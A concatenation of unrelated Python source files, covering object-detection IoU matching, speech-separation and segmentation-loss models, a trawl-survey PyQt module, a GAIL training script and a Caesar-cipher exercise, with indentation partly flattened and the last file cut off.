all_pixels = shape(bb_gt_ref.get(k))[1] + shape(bb_dt_ref.get(k)[a])[0] - common_pixels
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
elif (shape(bb_gt_ref.get(k))[0] > 1) & (shape(bb_dt_ref.get(k))[0] == 1):
for a in range(shape(bb_gt_ref.get(k))[0]):
for m in range(shape(bb_gt_ref.get(k)[a])[0]):
for n in range(shape(bb_dt_ref.get(k))[1]):
if (bb_gt_ref.get(k)[a][m] == bb_dt_ref.get(k)[0][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
all_pixels = shape(bb_gt_ref.get(k)[a])[0] + shape(bb_dt_ref.get(k))[1] - common_pixels
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
else:
for a in range(shape(bb_gt_ref.get(k))[0]):
for b in range(shape(bb_dt_ref.get(k))[0]):
for m in range(shape(bb_gt_ref.get(k)[a])[0]):
for n in range(shape(bb_dt_ref.get(k)[b])[0]):
if (bb_gt_ref.get(k)[a][m] == bb_dt_ref.get(k)[b][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
all_pixels = shape(bb_gt_ref.get(k)[a])[0] + shape(bb_dt_ref.get(k)[b])[0] - common_pixels
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
false_pos = shape(bb_dt_pixels)[0] - match
false_neg = shape(bb_gt_pixels)[0] - match
print('match = ', match)
print('false_pos = ', false_pos)
print('false_neg = ', false_neg)
print(time.time() - start_time, "seconds")
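# Equivalent box-level IoU sketch (an assumed simplification of the pixel-set
# comparison above): for axis-aligned boxes given as (x1, y1, x2, y2), the
# intersection-over-union follows directly from the corner coordinates.
def box_iou(gt, dt):
    ix1, iy1 = max(gt[0], dt[0]), max(gt[1], dt[1])
    ix2, iy2 = min(gt[2], dt[2]), min(gt[3], dt[3])
    iw, ih = max(0, ix2 - ix1 + 1), max(0, iy2 - iy1 + 1)
    inter = iw * ih
    area_gt = (gt[2] - gt[0] + 1) * (gt[3] - gt[1] + 1)
    area_dt = (dt[2] - dt[0] + 1) * (dt[3] - dt[1] + 1)
    return inter / float(area_gt + area_dt - inter)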
|
from setuptools import find_packages, setup
with open('README.md', 'r') as f:
long_description = f.read()
setup(
name='wids-datathon-2020',
version='0.1.5',
license='MIT',
author='Iain Wong',
author_email='[email protected]',
description='The challenge is to create a model that uses data from the first 24 hours of intensive care to predict patient survival. (Kaggle Proj) https://www.kaggle.com/c/widsdatathon2020/overview',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/iainwo/kaggle/tree/master/wids-datathon-2020',
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'pandas',
'python-dotenv',
'Click',
'pyarrow',
'numpy',
'scikit-learn',
],
python_requires='>=3.6',
)
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Reference : https://github.com/JusperLee/UtterancePIT-Speech-Separation/blob/master/model.py
"""
import warnings
warnings.filterwarnings('ignore')
import torch
import torch.nn as nn
import numpy as np
from torch.nn.utils.rnn import pad_packed_sequence
class PITNet(nn.Module):
"""
model_type:
0: original pit
1: dvec
2: simple mfcc
3: mfcc + conv
4: conv + mfcc
"""
def __init__(self, n_fft=129, rnn='lstm', num_spks=2, num_layers=3, hidden_size=896, dropout=0.0, non_linear='relu', bidirectional=True, model_type=0, f_dim=0):
super(PITNet, self).__init__()
self.num_spks = num_spks
rnn = rnn.upper()
assert non_linear in ['relu', 'sigmoid', 'tanh'], 'Unsupported non-linear type:{}'.format(non_linear)
assert rnn in ['RNN', 'LSTM', 'GRU'], 'Unsupported rnn type:{}'.format(rnn)
if model_type in [1, 3, 4]:
self.conv = nn.Sequential(
# cnn1
nn.ZeroPad2d((3, 3, 0, 0)),
nn.Conv2d(1, 64, kernel_size=(1, 7), dilation=(1, 1)),
nn.BatchNorm2d(64), nn.ReLU(),
# cnn2
nn.ZeroPad2d((0, 0, 3, 3)),
nn.Conv2d(64, 64, kernel_size=(7, 1), dilation=(1, 1)),
nn.BatchNorm2d(64), nn.ReLU(),
# cnn3
nn.ZeroPad2d(2),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(1, 1)),
nn.BatchNorm2d(64), nn.ReLU(),
# cnn4
nn.ZeroPad2d((2, 2, 4, 4)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(2, 1)), # (9, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn5
nn.ZeroPad2d((2, 2, 8, 8)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(4, 1)), # (17, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn6
nn.ZeroPad2d((2, 2, 16, 16)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(8, 1)), # (33, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn7
nn.ZeroPad2d((2, 2, 32, 32)),
nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(16, 1)), # (65, 5)
nn.BatchNorm2d(64), nn.ReLU(),
# cnn8
nn.Conv2d(64, 8, kernel_size=(1, 1), dilation=(1, 1)),
nn.BatchNorm2d(8), nn.ReLU(),
)
if model_type == 0:
input_size = n_fft
elif model_type == 1 or model_type == 4:
input_size = n_fft * 8 + f_dim
elif model_type == 2:
input_size = n_fft + f_dim
elif model_type == 3:
input_size = 8 * (n_fft + f_dim)
self.model_type = model_type
self.rnn = getattr(nn, rnn)(input_size, hidden_size, num_layers, batch_first=True, dropout=dropout, bidirectional=bidirectional)
self.rnn.flatten_parameters()
self.dropout = nn.Dropout(dropout)
self.linear = nn.ModuleList([
nn.Linear(hidden_size * 2 if bidirectional else hidden_size, n_fft)
for _ in range(self.num_spks)
])
        self.non_linear = {
            'relu': nn.functional.relu,
            'sigmoid': torch.sigmoid,  # nn.functional.sigmoid is deprecated
            'tanh': torch.tanh  # nn.functional.tanh is deprecated
        }[non_linear]
self.n_fft = n_fft
def forward(self, x, x_feature=None):
if self.model_type == 1:
x = x.unsqueeze(1)
x = self.conv(x)
x = x.transpose(1, 2).contiguous()
x = x.view(x.size(0), x.size(1), -1)
x_feature = x_feature.unsqueeze(1)
x_feature = x_feature.repeat(1, x.size(1), 1)
x = torch.cat((x, x_feature), dim=2)
elif self.model_type == 2:
# print(x.shape, x_feature.shape)
x = torch.cat((x, x_feature), dim=2)
elif self.model_type == 3:
x = torch.cat((x, x_feature), dim=2)
x = x.unsqueeze(1)
x = self.conv(x)
x = x.transpose(1, 2).contiguous()
x = x.view(x.size(0), x.size(1), -1)
elif self.model_type == 4:
x = x.unsqueeze(1)
x = self.conv(x)
x = x.transpose(1, 2).contiguous()
x = x.view(x.size(0), x.size(1), -1)
x = torch.cat((x, x_feature), dim=2)
# batch_size x time x frequency
# -> batch_size x time x hidden_size
x, _ = self.rnn(x)
x = self.dropout(x)
m = []
for linear in self.linear:
# batch_size x time x frequency
y = linear(x)
y = self.non_linear(y)
m.append(y)
return m
def disturb(self, std):
for p in self.parameters():
noise = torch.zeros_like(p).normal_(0, std)
p.data.add_(noise)
if __name__ == "__main__":
x = torch.randn(1, 375, 129)
    model = PITNet(model_type=0)
temp = torch.stack(model.forward(x))
s1, s2 = temp
print(s1.shape)
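    # Illustrative continuation (assumed usage, not part of the original file):
    # each mask is applied to the mixture spectrogram to estimate one source.
    est_s1 = s1 * x
    est_s2 = s2 * x
    print(est_s1.shape, est_s2.shape)  # both torch.Size([1, 375, 129])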
|
__author__ = 'Todd.Hay'
# -------------------------------------------------------------------------------
# Name: HaulSelection.py
# Purpose:
#
# Author: Todd.Hay
# Email: [email protected]
#
# Created: Jan 11, 2016
# License: MIT
#-------------------------------------------------------------------------------
from PyQt5.QtCore import pyqtProperty, pyqtSignal, pyqtSlot, QObject, QVariant, Qt, QModelIndex, QThread
from PyQt5.Qt import QJSValue, QQmlComponent, QWidget
from PyQt5.QtWidgets import QApplication
from py.common.FramListModel import FramListModel
from datetime import datetime, timedelta
from dateutil import tz, parser
import logging
import unittest
import inspect
import email
from xmlrpc import client as xrc
from py.trawl.TrawlBackdeckDB_model import Settings, Hauls, Catch, Specimen
from peewee import *
from playhouse.shortcuts import model_to_dict, dict_to_model
class OperationListModel(FramListModel):
def __init__(self, app=None, db=None, parent=None):
super().__init__()
self._app = app
self._db = db
self.add_role_name(name="status")
self.add_role_name(name="operationId")
self.add_role_name(name="operationNumber")
self.add_role_name(name="date")
self.add_role_name(name="startTime")
self.add_role_name(name="endTime")
self.add_role_name(name="isTest")
@pyqtSlot()
def add_test_operation(self):
"""
Method to add a test haul to the model + database
:param haul: QJSValue - dictionary contained in a QJSValue object
:return: None
"""
# Add to the Database
sql = "INSERT INTO HAULS('HAUL_NUMBER', 'START_DATETIME', 'END_DATETIME', 'PROCESSING_STATUS', 'IS_TEST') " + \
"VALUES(?, ?, ?, ?, ?);"
now = datetime.now()
date = now.strftime("%m/%d/%Y")
start = now
start_time = start.strftime("%H:%M:%S")
end = (now + timedelta(hours=1))
end_time = end.strftime("%H:%M:%S")
haul_number = "t" + str(round((now - datetime.utcfromtimestamp(0)).total_seconds() * 1000.0))
# Get all Test Hauls - Adjust the last three digits to be 900 and greater so as to not conflict
# with other haul numbers when we print specimen labels where we only keep the last three digits
# of the haul
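        # e.g. "t1452549600000" (t + ms since epoch) becomes "t1452549600900"
        # for the first test haul, "t...901" for the next, and so on.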
test_hauls = Hauls.select(fn.substr(Hauls.haul_number, 12, 3).alias('test_haul_number'))\
.where(Hauls.haul_number.contains("t"))\
.order_by(fn.substr(Hauls.haul_number, 12, 3).desc())
# for test_haul in test_hauls:
# logging.info('{0}'.format(test_haul.test_haul_number))
try:
last_test_haul_num = test_hauls.get().test_haul_number
if int(last_test_haul_num) < 900:
haul_last_three = "900"
else:
haul_last_three = str(int(last_test_haul_num) + 1)
except DoesNotExist as dne:
haul_last_three = "900"
except Exception as ex:
haul_last_three = "900"
haul_number = haul_number[:-3] + haul_last_three
# logging.info('last test haul num: {0} > {1}'.format(last_test_haul_num, haul_number))
haul = {"haulNumber": haul_number, "date": date,
"startTime": start_time, "endTime": end_time, "status": "Active", "isTest": "True"}
params = [haul_number, start.isoformat(), end.isoformat(), "Active", "True"]
self._db.execute(query=sql, parameters=params)
haul_id = self._db.get_last_rowid() # Return the primary key of the newly added record
# Add to the Model - N.B. need to first get the newly added HAUL_ID and add that to haul
haul["haulId"] = haul_id
is_added = False
for i in range(self.count):
if "t" in self.get(i)["haulNumber"]:
continue
self.insertItem(i, haul)
is_added = True
break
if not is_added:
self.appendItem(haul)
@pyqtSlot(int)
def delete_test_operation(self, index):
"""
Method to delete the test haul and associated catch_partition + specimen data from the DB
:param index: int - representing the index location in the model
:return:
"""
if index is None or index == -1 or not isinstance(index, int):
return
item = self.get(index)
status = item["status"]
haul_id = item["haulId"]
# Delete from the Model
self.removeItem(index)
# Update the state machine as appropriate
if status == "Selected" or self.count == 0:
self._app.state_machine.haul = None
try:
haul = Hauls.get(Hauls.haul == haul_id)
haul.delete_instance(recursive=True, delete_nullable=True)
except Exception as ex:
pass
@pyqtSlot(int, result=bool)
def check_operation_for_data(self, index=None):
"""
        Method to determine if a given selected haul (defined by index) has catch or specimen data
:param index: int - index of the hauls model selected
:return:
"""
if index is None or index == -1 or not isinstance(index, int):
return
item = self.get(index)
haul_id = item["haulId"]
catch = Catch.select().where(Catch.operation == haul_id)
if catch.count() > 0:
return True
        # NOTE: catch is empty at this point, so the specimen loop below never
        # iterates; it is kept for parity with the original structure.
        for species in catch:
specimen = Specimen.select().where(Specimen.catch == species.catch)
if specimen.count() > 0:
return True
return False
@pyqtSlot(QVariant, QVariant, str)
def set_operation_processing_status(self, current_id, haul_id, processing_status):
"""
        Method to update the processing status of the haul in the model + database
        :param current_id: int - haul currently selected; reset to Active
        :param haul_id: int - haul to receive the new processing status
        :param processing_status: str - either "Selected" or "Completed"
        :return: None
"""
if haul_id is None or not isinstance(haul_id, int):
return
if processing_status not in ["Selected", "Completed"]:
return
# Update the model
# Set currently selected row to Active
if current_id:
old_row_num = self.get_item_index("haulId", current_id)
self.setProperty(old_row_num, "status", "Active")
sql = "UPDATE HAULS SET PROCESSING_STATUS = 'Active' WHERE HAUL_ID = ?;"
params = [current_id, ]
self._db.execute(query=sql, parameters=params)
# Set the new row in the model to Selected
row_num = self.get_item_index("haulId", haul_id)
self.setProperty(row_num, "status", processing_status)
# Update the Database
sql = "UPDATE HAULS SET PROCESSING_STATUS = ? WHERE HAUL_ID = ?;"
params = [processing_status, haul_id]
self._db.execute(query=sql, parameters=params)
# Update Haul State
if processing_status == "Completed":
self._app.state_machine.haul = None
elif processing_status == "Selected":
self._app.state_machine.haul = haul_id
class GetOperationsWorker(QObject):
operationsReceived = pyqtSignal(list)
def __init__(self, app=None, db=None, args=(), kwargs=None):
super().__init__()
self._app = app
self._db = db
self._is_running = False
self.hauls = []
self._ip = self._app.settings.wheelhouseIpAddress
self._port = self._app.settings.wheelhouseRpcServerPort
def run(self):
self._is_running = True
haul_data = []
# Query the wheelhouse via the RpcServer for the daily hauls
ip = self._app.settings.wheelhouseIpAddress
port = self._app.settings.wheelhouseRpcServerPort
logging.info('Wheelhouse RpcServer address: ' + str(ip) + ", " + str(port))
real_hauls = []
try:
server = xrc.ServerProxy('http://' + ip + ':' + str(port), allow_none=True, use_builtin_types=True)
real_hauls = server.get_hauls()
logging.info('Number of hauls received from wheelhouse: ' + str(len(real_hauls)))
except Exception as ex:
logging.info('Error contacting wheelhouse computer: ' + str(ex))
        # For each newly retrieved haul, insert it into the database if it doesn't exist, otherwise fetch the existing haul
for real_haul in real_hauls:
current_haul, created = Hauls.get_or_create(haul_number=real_haul["haul_number"],
defaults={'start_datetime': real_haul["start_time"] if "start_time" in real_haul else None,
'end_datetime': real_haul["end_time"] if "end_time" in real_haul else None,
'latitude_min': real_haul["latitude"] if "latitude" in real_haul else None,
'longitude_min': real_haul["longitude"] if "longitude" in real_haul else None,
'latitude_max': real_haul["latitude"] if "latitude" in real_haul else None,
'longitude_max': real_haul["longitude"] if "longitude" in real_haul else None,
'depth_min': real_haul["depth"] if "depth" in real_haul else None,
'depth_max': real_haul["depth"] if "depth" in real_haul else None,
'vessel_name': real_haul["vessel_name"] if "vessel_name" in real_haul else None,
'vessel_color': real_haul["vessel_color"] if "vessel_color" in real_haul else None,
'pass_number': real_haul["pass"] if "pass" in real_haul else None,
'leg_number': real_haul["leg"] if "leg" in real_haul else None,
'is_test': "False"})
if created:
Hauls.update(processing_status="Active").where(Hauls.haul_number == real_haul["haul_number"]).execute()
else:
if "start_time" in real_haul:
if current_haul.start_datetime != real_haul["start_time"]:
Hauls.update(start_datetime = real_haul["start_time"], end_datetime = None).where(Hauls.haul_number == real_haul["haul_number"]).execute()
else:
Hauls.update(start_datetime=None).where(Hauls.haul_number == real_haul["haul_number"]).execute()
if "end_time" in real_haul:
if current_haul.end_datetime != real_haul["end_time"]:
Hauls.update(end_datetime = real_haul["end_time"]).where(Hauls.haul_number == real_haul["haul_number"]).execute()
else:
Hauls.update(end_datetime=None).where(Hauls.haul_number == real_haul["haul_number"]).execute()
current_haul = Hauls.get(haul_number=real_haul["haul_number"])
haul_data.append(model_to_dict(current_haul))
self._is_running = False
self.operationsReceived.emit(haul_data)
class OperationSelection(QObject):
"""
Class for the HaulSelectionScreen.
"""
operationsModelChanged = pyqtSignal(str)
def __init__(self, app=None, db=None):
super().__init__()
# No-No way of getting a handle to the calling object, replaced by passing in the app object itself
# self.app = inspect.currentframe().f_back.f_locals['self']
self._app = app
self._logger = logging.getLogger(__name__)
self._db = db
self._operations_model = OperationListModel(app=self._app, db=self._db)
self._local_operations = []
self._wheelhouse_operations = []
self._timeframe = 0
self._get_operations_thread = QThread()
self._get_operations_worker = GetOperationsWorker(app=self._app, db=self._db)
self._get_operations_worker.moveToThread(self._get_operations_thread)
self._get_operations_worker.operationsReceived.connect(self._wheelhouse_operations_received)
self._get_operations_thread.started.connect(self._get_operations_worker.run)
self._get_operations_from_db()
@pyqtProperty(FramListModel, notify=operationsModelChanged)
def OperationsModel(self):
"""
Method to return the self._hauls_model
:return: FramListModel
"""
return self._operations_model
@pyqtSlot(str)
def _get_operations_from_db(self, time_frame="today"):
"""
Method to query the trawl_backdeck.db to retrieve all of the test hauls
:return:
"""
if time_frame not in ["today", "two days", "all"]:
return
adapter = {"today": 0, "two days": 1, "all": 1000}
time_frame = adapter[time_frame]
# Retrieve all test hauls from the database
self._local_operations = []
start_datetime = (datetime.now().date() - timedelta(days=time_frame)).isoformat()
local_operations = Hauls.select().where((Hauls.start_datetime >= start_datetime) | (Hauls.is_test == "True"))
for op in local_operations:
self._local_operations.append(model_to_dict(op))
self._operations_model.clear()
self._add_model_items(operations=self._local_operations)
@pyqtSlot()
def _get_operations_from_wheelhouse(self):
"""
Method to query the wheelhouse RpcServer to retrieve the hauls for the past 24 hours
:return:
"""
if self._get_operations_thread.isRunning():
return
self._get_operations_thread.start()
def _wheelhouse_operations_received(self, operations):
self._get_operations_thread.quit()
self._wheelhouse_operations = operations
self._add_model_items(operations=self._wheelhouse_operations)
def _add_model_items(self, operations):
"""
Method to add a select set of hauls to the self._hauls_model
:param operations:
:return:
"""
for h in operations:
haulNumber = h["haul_number"]
if "t" not in haulNumber:
haulNumber = str(haulNumber[-3:])
index = self._operations_model.get_item_index(rolename="haulNumber", value=haulNumber)
# if index != -1:
# logging.info('haul exists: ' + str(self._hauls_model.get(index)))
if index == -1:
# logging.info('missing haul: ' + str(index) + ', value: ' + str(h["haul_number"]))
haul = dict()
haul["haulId"] = h["haul"]
haul["status"] = h["processing_status"]
if 't' in h["haul_number"]:
haul["haulNumber"] = h["haul_number"]
elif h["haul_number"]:
haul["haulNumber"] = str(h["haul_number"][-3:])
haul["date"] = parser.parse(h["start_datetime"]).strftime("%m/%d/%Y") if h["start_datetime"] else ""
haul["startTime"] = parser.parse(h["start_datetime"]).strftime("%H:%M:%S") if h[
"start_datetime"] else ""
haul["endTime"] = parser.parse(h["end_datetime"]).strftime("%H:%M:%S") if h["end_datetime"] else ""
if h["is_test"]:
haul["isTest"] = h["is_test"]
else:
haul["isTest"] = "False"
self._operations_model.appendItem(haul)
if haul['status'] == 'Selected':
self._app.state_machine.selectedHaulId = haul['haulId']
else:
# Haul was found in the model, update the start and end times if they are different from what is currently in the model
if h["start_datetime"]:
if parser.parse(h["start_datetime"]).strftime("%H:%M:%S") != self._operations_model.get(index)["startTime"]:
self._operations_model.setProperty(index=index, property="startTime",
value=parser.parse(h["start_datetime"]).strftime("%H:%M:%S"))
self._operations_model.setProperty(index=index, property="endTime", value=None)
else:
self._operations_model.setProperty(index=index, property="startTime", value=None)
if h["end_datetime"]:
if parser.parse(h["end_datetime"]).strftime("%H:%M:%S") != self._operations_model.get(index)["endTime"]:
self._operations_model.setProperty(index=index, property="endTime", value=parser.parse(h["end_datetime"]).strftime("%H:%M:%S"))
else:
self._operations_model.setProperty(index=index, property="endTime", value=None)
items = self._operations_model.items
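        # Sort test hauls (non-numeric ids, so isdigit() is False) ahead of
        # numeric hauls, then order each group by haul number.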
items = sorted(items, key=lambda x: (x["haulNumber"].isdigit(), x["haulNumber"]))
self._operations_model.clear()
self._operations_model.setItems(items)
|
default_app_config = 'healthz.apps.HealthzConfig'
|
# use consecutive time steps, excluding actions as the input
# sample trajs as a semi-circle to the goal
import gym
from stable_baselines.gail import ExpertDataset, generate_expert_traj
from stable_baselines.gail.dataset.dataset import ExpertDatasetConsecutive, ExpertDatasetConsecutiveManual
import numpy as np
from stable_baselines.common.policies import MlpPolicy
from stable_baselines.common.vec_env import DummyVecEnv
from stable_baselines import PPO2
from stable_baselines import PPO1
import os
import matplotlib.pyplot as plt
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="9"
###############################################
from particle_env_continuous_closer_gail import PrticleEnv
from stable_baselines.gail.gail_useTrueReward_consecutiveTimeStep import GAIL
env = DummyVecEnv([lambda: PrticleEnv(alpha=1,beta=10,win_thre=1, max_timestep=1024)])
save_name = "model/gail_exp4"
epochs = 10
timestep_per_epoch = int(1e5)
expert_n_episodes = 100
###########################################
def visualize_traj_data(traj_data):
obs = traj_data['obs']
obs = obs[np.random.choice(len(obs),1000)]
    x, y, x_dot, y_dot = obs[:, 0], obs[:, 1], obs[:, 2], obs[:, 3]
    for xi, yi, xi_dot, yi_dot in zip(x, y, x_dot, y_dot):
        plt.plot([xi, xi + xi_dot * .1], [yi, yi + yi_dot * .1])
plt.show()
if __name__ == "__main__":
if not os.path.exists(save_name):
os.makedirs(save_name)
print("\n...Generate expert trajectories\n")
expert_obs_data = env.envs[0].sample_circle_traj() #(N,4)
traj_data = {"obs":expert_obs_data}
dataset = ExpertDatasetConsecutiveManual(traj_data=traj_data, traj_limitation=-1, verbose=0)
print("...finish\n")
visualize_traj_data(traj_data)
model = GAIL('MlpPolicy',env, dataset,
tensorboard_log=save_name,
verbose=0, n_cpu_tf_sess=1)
# Note: in practice, you need to train for 1M steps to have a working policy
print("\n...GAIL learning\n")
for idx in range(epochs):
model.learn(total_timesteps=timestep_per_epoch, reset_num_timesteps=False)
model.save(save_name+"_%03dk" %((idx+1)*timestep_per_epoch/1e3))
# print("...finish\n")
# del model
|
""" File to contain constants """
PACKAGE_LOGGER_NAME = 'service_framework'
|
"""
This program encodes/decodes text given to it as an input.
It takes three arguments as an input:
1. Action: Encode/Decode
1. Text to be encoded/decoded
2. Shift value (The value by which the alphabets will be shifted)
"""
from caesar_art import logo
from time import perf_counter
from time import process_time
# Time Tracking Start
tic1 = perf_counter()
tic2 = process_time()
# Print the caesar cipher logo
print(logo)
# Initialize alphabets list. The letter sequence is repeated four times so that
# indexes shifted past 'z' stay in range; negative shifts (decoding) wrap around
# via Python's negative indexing.
alphabets = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',
'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
def caesar(action, input_text, shift_amount):
"""
This function encodes/decodes the text
:param action: Encode/Decode value
:param input_text: The text that will be encoded/decoded
:param shift_amount: The amount by which the alphabets will be shifted
:return: This function does not return a value but prints the transformed string
"""
transformed_text = ''
# If the action is decode, make the shift_amount as negative
if action == 'decode':
shift_amount *= -1
# Add/Subtract the shift value to get the index from alphabets list
for alphabet in input_text:
if alphabet in alphabets:
index = alphabets.index(alphabet)
new_index = index + shift_amount
new_alphabet = alphabets[new_index]
transformed_text += new_alphabet
else:
transformed_text += alphabet
# Print the result
print(f'The {action}d text is {transformed_text}')
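# A more compact variant (illustrative sketch, not used by the program below):
# reducing the shift modulo 26 removes the need for the repeated alphabet list
# and supports arbitrarily large shift values.
def caesar_mod(action, input_text, shift_amount):
    base = ord('a')
    if action == 'decode':
        shift_amount *= -1
    return ''.join(
        chr((ord(ch) - base + shift_amount) % 26 + base) if ch.islower() else ch
        for ch in input_text
    )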
# Initialize a variable to end the program
go_again = True
# Check if the user wants to run the program again and get the inputs accordingly
while go_again:
enc_dec = input('Type "encode" to encrypt, type "decode" to decrypt:\n').casefold()
text = input('Type your message:\n').casefold()
shift = int(input('Type the shift number:\n'))
caesar(action=enc_dec, input_text=text, shift_amount=shift)
response = input('If you want to go again, type "yes" otherwise type "no":\n').casefold()
# Exit the program if user does not want to continue
if response == 'no':
go_again = False
print('Thank you for using this program.')
# Time Tracking End
toc1 = perf_counter()
toc2 = process_time()
# Print execution time
print('\nExecution Time Details:')
print(f'Total execution time including wait/sleep time: {round(toc1 - tic1, 2)}s')
print(f'Total execution time excluding wait/sleep time: {round(toc2 - tic2, 2)}s')
|
# REF: https://github.com/hubutui/DiceLoss-PyTorch/blob/master/loss.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import weight_reduce_loss
from ..builder import LOSSES
def _make_one_hot(gt, num_classes, ignore=0):
"""
:param label: [N, *], values in [0,num_classes)
:param ignore: ignore value of background, here is 0
:return: [N, C, *]
"""
    # NOTE: operates on gt in place; callers are expected to pass a clone
    # (see binary_loss below)
    label = gt
label = label.unsqueeze(1)
shape = list(label.shape)
shape[1] = num_classes + 1
if ignore is not None:
label[label == ignore] = num_classes + 1
label = label - 1
result = torch.zeros(shape, device=label.device)
result.scatter_(1, label, 1)
return result[:, :-1, ]
def binary_ce_loss(pred, label, **kwargs):
loss = F.binary_cross_entropy(pred, label, reduction='none')
loss = torch.mean(loss, dim=(1, 2))
return loss
def binary_cbce_loss(pred, label, **kwargs):
"""
:param pred: [N, *]: here should be scores in [0,1]
:param label: [N, *]: values in [0,1]
:return: [N]
"""
mask = (label > 0.5).float()
b, h, w = mask.shape
num_pos = torch.sum(mask, dim=[1, 2]).float() # Shape: [N,].
num_neg = h * w - num_pos # Shape: [N,].
weight = torch.zeros_like(mask)
pos_weight = num_neg / (num_pos + num_neg)
neg_weight = num_pos / (num_pos + num_neg)
for i in range(b):
weight[i][label[i] > 0.5] = pos_weight[i]
weight[i][label[i] <= 0.5] = neg_weight[i]
    loss = torch.nn.functional.binary_cross_entropy(pred.float(), label.float(), weight=weight, reduction='none')
    # reduce over the spatial dims so the return shape is [N], as documented
    # and consistent with the other binary losses
    loss = torch.mean(loss, dim=(1, 2))
    return loss
def binary_dice_loss(pred, label, smooth=1.0):
"""
:param pred: [N, *]: here should be scores in [0,1]
:param label: [N, *]: values in [0,1]
:param smooth: smooth
:return: [N]
"""
pred = pred.contiguous().view(pred.shape[0], -1).float()
label = label.contiguous().view(label.shape[0], -1).float()
num = 2 * torch.sum(torch.mul(pred, label), dim=1) + smooth
den = torch.sum(pred, dim=1) + torch.sum(label, dim=1) + smooth
loss = 1. - num / den
return loss
def binary_ce_dice_loss(pred, label, smooth=1.0, **kwargs):
loss1 = binary_ce_loss(pred, label, **kwargs)
loss2 = binary_dice_loss(pred, label, smooth=smooth)
return loss1 + loss2
def binary_loss(pred_raw,
label_raw,
loss_func,
weight=None,
class_weight=None,
class_weight_norm=False,
reduction='mean',
avg_factor=None,
smooth=1.0,
**kwargs):
"""
:param pred: [N, C, *] scores without softmax
:param label: [N, *] in [0, C], 0 stands for background, 1~C stands for pred in 0~C-1
:return: reduction([N])
"""
pred = pred_raw.clone()
label = label_raw.clone()
num_classes = pred.shape[1]
if class_weight is not None:
class_weight = class_weight.float()
if pred.shape != label.shape:
label = _make_one_hot(label, num_classes)
pred = torch.sigmoid(pred)
loss = 0.
for i in range(num_classes):
if isinstance(loss_func, tuple):
loss_function = loss_func[i]
else:
loss_function = loss_func
class_loss = loss_function(pred[:, i], label[:, i], smooth=smooth)
if class_weight is not None:
class_loss *= class_weight[i]
loss += class_loss
if class_weight is not None and class_weight_norm:
loss = loss / torch.sum(class_weight)
else:
loss = loss / num_classes
loss = weight_reduce_loss(loss, weight=weight, reduction=reduction, avg_factor=avg_factor)
return loss
@LOSSES.register_module()
class BinaryLoss(nn.Module):
def __init__(self,
loss_type='ce',
reduction='mean',
class_weight=None,
class_weight_norm=False,
loss_weight=1.0,
smooth=1.0,
**kwargs):
super(BinaryLoss, self).__init__()
assert loss_type in ['ce', 'dice', 'cbce', 'ce_dice', 'mix']
self.reduction = reduction
self.loss_weight = loss_weight
self.class_weight = class_weight
self.class_weight_norm = class_weight_norm
self.loss_type = loss_type
self.smooth = smooth
def forward(self,
cls_score,
label,
weight=None,
avg_factor=None,
reduction_override=None,
**kwargs):
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
if self.class_weight is not None:
class_weight = cls_score.new_tensor(self.class_weight)
assert class_weight.shape[0] == cls_score.shape[1], \
'Expect weight shape [{}], get[{}]'.format(cls_score.shape[1], class_weight.shape[0])
else:
class_weight = None
loss_func = None
if self.loss_type == 'ce':
loss_func = binary_ce_loss
elif self.loss_type == 'dice':
loss_func = binary_dice_loss
elif self.loss_type == 'ce_dice':
loss_func = binary_ce_dice_loss
elif self.loss_type == 'mix':
loss_func = (binary_ce_loss, binary_ce_loss, binary_ce_loss, binary_dice_loss)
elif self.loss_type == 'cbce':
loss_func = binary_cbce_loss
loss_cls = self.loss_weight * binary_loss(
cls_score,
label,
loss_func,
weight,
class_weight=class_weight,
class_weight_norm=self.class_weight_norm,
reduction=reduction,
avg_factor=avg_factor,
smooth=self.smooth
)
return loss_cls
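# Illustrative usage sketch (shapes and values below are made up, not taken
# from the original training configs):
#
#   loss_fn = BinaryLoss(loss_type='dice', smooth=1.0)
#   cls_score = torch.randn(2, 3, 4, 4)      # raw logits, [N, C, H, W]
#   label = torch.randint(0, 4, (2, 4, 4))   # 0 = background, 1..3 = classes
#   loss = loss_fn(cls_score, label)         # scalar after 'mean' reduction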
|
from collections import OrderedDict
def suggestion_list(inp, options):
"""
Given an invalid input string and a list of valid options, returns a filtered
list of valid options sorted based on their similarity with the input.
"""
options_by_distance = OrderedDict()
input_threshold = len(inp) / 2
for option in options:
distance = lexical_distance(inp, option)
